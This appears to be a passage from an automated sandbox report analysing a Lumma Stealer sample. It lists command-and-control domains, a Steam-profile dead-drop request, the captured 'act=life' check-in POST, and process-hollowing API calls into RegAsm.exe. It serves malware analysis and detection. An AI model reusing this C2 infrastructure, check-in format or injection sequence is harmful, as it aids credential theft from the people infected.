.text	0x2000	0x590f4	0x59200	532838af33e39715b352ed7121d4f436	False	0.9936886395511921	data	7.995724440591308	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x5c000	0x5b8	0x600	962bbee863727d4b25a14a8f824a789c	False	0.4375	data	4.119761219082767	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x5e000	0xc	0x200	547b97b45a8f5813577b1cdd508c80eb	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x5c0a0	0x324	data			0.4552238805970149
RT_MANIFEST	0x5c3c8	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5469387755102041

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-06T22:10:13.773894+0200	2056156	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (drawzhotdog .shop)	1	192.168.2.5	50040	1.1.1.1	53	UDP
2024-10-06T22:10:13.787877+0200	2056164	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (gutterydhowi .shop)	1	192.168.2.5	57900	1.1.1.1	53	UDP
2024-10-06T22:10:13.799408+0200	2056162	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (ghostreedmnu .shop)	1	192.168.2.5	62439	1.1.1.1	53	UDP
2024-10-06T22:10:13.810493+0200	2056160	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (offensivedzvju .shop)	1	192.168.2.5	56174	1.1.1.1	53	UDP
2024-10-06T22:10:13.821066+0200	2056158	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (vozmeatillu .shop)	1	192.168.2.5	55453	1.1.1.1	53	UDP
2024-10-06T22:10:13.833186+0200	2056154	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fragnantbui .shop)	1	192.168.2.5	52968	1.1.1.1	53	UDP
2024-10-06T22:10:13.848240+0200	2056152	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (stogeneratmns .shop)	1	192.168.2.5	64125	1.1.1.1	53	UDP
2024-10-06T22:10:13.858841+0200	2056150	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (reinforcenh .shop)	1	192.168.2.5	51454	1.1.1.1	53	UDP
2024-10-06T22:10:17.132757+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49708	172.67.206.204	443	TCP
2024-10-06T22:10:17.132757+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49708	172.67.206.204	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 6, 2024 22:10:13.891747952 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:13.891767979 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:13.891855001 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:13.893578053 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:13.893590927 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:14.549107075 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:14.549173117 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:14.555155039 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:14.555162907 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:14.555449009 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:14.608724117 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:14.656038046 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:14.699407101 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:15.069921017 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:15.069981098 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:15.070002079 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:15.070041895 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:15.070060015 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:15.070086002 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:15.070086002 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:15.070099115 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:15.070112944 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:15.070127010 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:15.070174932 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:16.142330885 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:16.142366886 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:16.142416000 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:16.142601013 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:16.142601013 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:16.142616987 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:16.142709970 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:16.142714977 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:16.142760992 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:16.142821074 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:16.142898083 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:16.144859076 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:16.144859076 CEST	49707	443	192.168.2.5	104.102.49.254
Oct 6, 2024 22:10:16.144876003 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:16.144886971 CEST	443	49707	104.102.49.254	192.168.2.5
Oct 6, 2024 22:10:16.160856009 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:16.160881042 CEST	443	49708	172.67.206.204	192.168.2.5
Oct 6, 2024 22:10:16.161015987 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:16.161366940 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:16.161381006 CEST	443	49708	172.67.206.204	192.168.2.5
Oct 6, 2024 22:10:16.630119085 CEST	443	49708	172.67.206.204	192.168.2.5
Oct 6, 2024 22:10:16.630279064 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:16.633501053 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:16.633507967 CEST	443	49708	172.67.206.204	192.168.2.5
Oct 6, 2024 22:10:16.633760929 CEST	443	49708	172.67.206.204	192.168.2.5
Oct 6, 2024 22:10:16.634996891 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:16.634996891 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:16.635061979 CEST	443	49708	172.67.206.204	192.168.2.5
Oct 6, 2024 22:10:17.132816076 CEST	443	49708	172.67.206.204	192.168.2.5
Oct 6, 2024 22:10:17.133069038 CEST	443	49708	172.67.206.204	192.168.2.5
Oct 6, 2024 22:10:17.133147955 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:17.133725882 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:17.133752108 CEST	443	49708	172.67.206.204	192.168.2.5
Oct 6, 2024 22:10:17.133949995 CEST	49708	443	192.168.2.5	172.67.206.204
Oct 6, 2024 22:10:17.133955956 CEST	443	49708	172.67.206.204	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 6, 2024 22:10:13.773894072 CEST	50040	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:13.785722971 CEST	53	50040	1.1.1.1	192.168.2.5
Oct 6, 2024 22:10:13.787877083 CEST	57900	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:13.797681093 CEST	53	57900	1.1.1.1	192.168.2.5
Oct 6, 2024 22:10:13.799407959 CEST	62439	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:13.809118986 CEST	53	62439	1.1.1.1	192.168.2.5
Oct 6, 2024 22:10:13.810492992 CEST	56174	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:13.819411039 CEST	53	56174	1.1.1.1	192.168.2.5
Oct 6, 2024 22:10:13.821065903 CEST	55453	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:13.830128908 CEST	53	55453	1.1.1.1	192.168.2.5
Oct 6, 2024 22:10:13.833185911 CEST	52968	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:13.842364073 CEST	53	52968	1.1.1.1	192.168.2.5
Oct 6, 2024 22:10:13.848239899 CEST	64125	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:13.856996059 CEST	53	64125	1.1.1.1	192.168.2.5
Oct 6, 2024 22:10:13.858840942 CEST	51454	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:13.867512941 CEST	53	51454	1.1.1.1	192.168.2.5
Oct 6, 2024 22:10:13.868966103 CEST	59023	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:13.875830889 CEST	53	59023	1.1.1.1	192.168.2.5
Oct 6, 2024 22:10:16.149686098 CEST	63585	53	192.168.2.5	1.1.1.1
Oct 6, 2024 22:10:16.160093069 CEST	53	63585	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 6, 2024 22:10:13.773894072 CEST	192.168.2.5	1.1.1.1	0x3e0b	Standard query (0)	drawzhotdog.shop	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.787877083 CEST	192.168.2.5	1.1.1.1	0xe762	Standard query (0)	gutterydhowi.shop	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.799407959 CEST	192.168.2.5	1.1.1.1	0xa8f8	Standard query (0)	ghostreedmnu.shop	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.810492992 CEST	192.168.2.5	1.1.1.1	0x3d7a	Standard query (0)	offensivedzvju.shop	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.821065903 CEST	192.168.2.5	1.1.1.1	0xb065	Standard query (0)	vozmeatillu.shop	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.833185911 CEST	192.168.2.5	1.1.1.1	0x5b5a	Standard query (0)	fragnantbui.shop	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.848239899 CEST	192.168.2.5	1.1.1.1	0x83ee	Standard query (0)	stogeneratmns.shop	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.858840942 CEST	192.168.2.5	1.1.1.1	0xce83	Standard query (0)	reinforcenh.shop	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.868966103 CEST	192.168.2.5	1.1.1.1	0xd5e2	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:16.149686098 CEST	192.168.2.5	1.1.1.1	0x2993	Standard query (0)	sergei-esenin.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 6, 2024 22:10:13.785722971 CEST	1.1.1.1	192.168.2.5	0x3e0b	Name error (3)	drawzhotdog.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.797681093 CEST	1.1.1.1	192.168.2.5	0xe762	Name error (3)	gutterydhowi.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.809118986 CEST	1.1.1.1	192.168.2.5	0xa8f8	Name error (3)	ghostreedmnu.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.819411039 CEST	1.1.1.1	192.168.2.5	0x3d7a	Name error (3)	offensivedzvju.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.830128908 CEST	1.1.1.1	192.168.2.5	0xb065	Name error (3)	vozmeatillu.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.842364073 CEST	1.1.1.1	192.168.2.5	0x5b5a	Name error (3)	fragnantbui.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.856996059 CEST	1.1.1.1	192.168.2.5	0x83ee	Name error (3)	stogeneratmns.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.867512941 CEST	1.1.1.1	192.168.2.5	0xce83	Name error (3)	reinforcenh.shop	none	none	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:13.875830889 CEST	1.1.1.1	192.168.2.5	0xd5e2	No error (0)	steamcommunity.com		104.102.49.254	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:16.160093069 CEST	1.1.1.1	192.168.2.5	0x2993	No error (0)	sergei-esenin.com		172.67.206.204	A (IP address)	IN (0x0001)	false
Oct 6, 2024 22:10:16.160093069 CEST	1.1.1.1	192.168.2.5	0x2993	No error (0)	sergei-esenin.com		104.21.53.8	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

steamcommunity.com

sergei-esenin.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49707	104.102.49.254	443	6404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-06 20:10:14 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-10-06 20:10:15 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sun, 06 Oct 2024 20:10:14 GMT Content-Length: 34837 Connection: close Set-Cookie: sessionid=0dd0c0066c0017024331ac3f; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-10-06 20:10:15 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-06 20:10:16 UTC	16384	IN	Data Raw: 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0d 0a 09 09 6a 51 75 65 72 79 28 66 75 6e 63 74 69 6f 6e 28 24 29 20 7b 0d 0a 09 09 09 24 28 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 27 29 2e 76 5f 74 6f 6f 6c 74 69 70 28 7b 27 6c 6f 63 61 74 69 6f 6e 27 3a 27 62 6f 74 74 6f 6d 27 2c 20 27 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f Data Ascii: <script type="text/javascript">jQuery(function($) {$('#global_header .supernav').v_tooltip({'location':'bottom', 'destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#glo
2024-10-06 20:10:16 UTC	3768	IN	Data Raw: 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 73 75 6d 6d 61 72 79 5f 66 6f 6f 74 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 3c 73 70 61 6e 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 Data Ascii: <div class="profile_summary_footer"><span data-panel="{"focusable":true,"clickOnActivate":true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function()
2024-10-06 20:10:16 UTC	171	IN	Data Raw: 09 3c 73 70 61 6e 3e 56 69 65 77 20 6d 6f 62 69 6c 65 20 77 65 62 73 69 74 65 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 0d 0a 09 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <span>View mobile website</span></div></div></div></div>... responsive_page_content --></div>... responsive_page_frame --></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	172.67.206.204	443	6404	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-06 20:10:16 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: sergei-esenin.com
2024-10-06 20:10:16 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-10-06 20:10:17 UTC	780	IN	HTTP/1.1 200 OK Date: Sun, 06 Oct 2024 20:10:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=t724hahr75evok4lnt3r4mcd83; expires=Thu, 30 Jan 2025 13:56:55 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gYECPDgKGVW1p13tP8U3ZJSzKljPQ1COGp644qQ%2FTtCR6UVDH9%2Fn%2FpcrERcCB74K7M7lJEaiLs4CdlVFhiNa4eNB9%2Fy0etTDfO39REjOPHkYtI1g%2Bo8MeJOL%2B9r3bCOEtob8wQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ce84b3e5c4e432c-EWR
2024-10-06 20:10:17 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-10-06 20:10:17 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	16:10:11
Start date:	06/10/2024
Path:	C:\Users\user\Desktop\A6QFRW2WiY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\A6QFRW2WiY.exe"
Imagebase:	0x1d0000
File size:	377'384 bytes
MD5 hash:	0CEE1D66332DEC523210F62E479284B9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	16:10:11
Start date:	06/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	16:10:13
Start date:	06/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xed0000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	35.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	26.9%
Total number of Nodes:	26
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 024D2149 Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,024D20BB,024D20AB), ref: 024D22B8
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 024D22CB
Wow64GetThreadContext.KERNEL32(0000009C,00000000), ref: 024D22E9
ReadProcessMemory.KERNELBASE(0000031C,?,024D20FF,00000004,00000000), ref: 024D230D
VirtualAllocEx.KERNELBASE(0000031C,?,?,00003000,00000040), ref: 024D2338
WriteProcessMemory.KERNELBASE(0000031C,00000000,?,?,00000000,?), ref: 024D2390
WriteProcessMemory.KERNELBASE(0000031C,00400000,?,?,00000000,?,00000028), ref: 024D23DB
WriteProcessMemory.KERNELBASE(0000031C,?,?,00000004,00000000), ref: 024D2419
Wow64SetThreadContext.KERNEL32(0000009C,04B20000), ref: 024D2455
ResumeThread.KERNELBASE(0000009C), ref: 024D2464

Strings

GetThreadContext, xrefs: 024D2223
VirtualAlloc, xrefs: 024D2210
Load, xrefs: 024D2187
VirtualAllocEx, xrefs: 024D2249
WriteProcessMemory, xrefs: 024D225C
ress, xrefs: 024D21D3
GetP, xrefs: 024D21CB
ResumeThread, xrefs: 024D2285
TerminateProcess, xrefs: 024D2347
CreateProcessA, xrefs: 024D21FD
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 024D22B7
SetThreadContext, xrefs: 024D226F
ReadProcessMemory, xrefs: 024D2236
aryA, xrefs: 024D218F

Memory Dump Source

Source File: 00000000.00000002.2066375952.00000000024D1000.00000040.00000800.00020000.00000000.sdmp, Offset: 024D1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_24d1000_A6QFRW2WiY.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: 43e49f48ef677f670ce304518d986a8b348342a27a78f443f56cb3e325c16cf6
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: EAB1E57664024AAFDB60CF68CC80BDA77A5FF88714F158525EA0CAB342D774FA41CB94

Function 00C11330 Relevance: 1.6, APIs: 1, Instructions: 137
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C112F0

Memory Dump Source

Source File: 00000000.00000002.2066333122.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_A6QFRW2WiY.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 92db48b90dd4ca9cac674afba713d8fe26003fd482ad138428e966de4ef9a9f8
Instruction ID: 10f2999af694cd70908c8012c834aac8812c7761e2c4d0320e41a3e7022d6ff1
Opcode Fuzzy Hash: 92db48b90dd4ca9cac674afba713d8fe26003fd482ad138428e966de4ef9a9f8
Instruction Fuzzy Hash: 7C5145B1D052999FCF10DFA9D881ADEFFF0BF4A310F14805AE918AB251C3789941CBA1

Function 00C11268 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(?,?,?,?,?), ref: 00C112F0

Memory Dump Source

Source File: 00000000.00000002.2066333122.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c10000_A6QFRW2WiY.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 8730cdb0e73ada13730099fb0f60a397e3bf93a939011fb4a5ec7c85925a4fbc
Instruction ID: 6a2870c9fefdff64dc1fcd401d27291f99b004e92fef833f9f27fa81d3cec854
Opcode Fuzzy Hash: 8730cdb0e73ada13730099fb0f60a397e3bf93a939011fb4a5ec7c85925a4fbc
Instruction Fuzzy Hash: 4B2112B09002499FCB10DFAAC881AEEBBF0FF49310F14842EE919A7250C7789941CBA1

Function 00C11270 Relevance: 1.6, APIs: 1, Instructions: 56
COMMON

Download Yara Rule

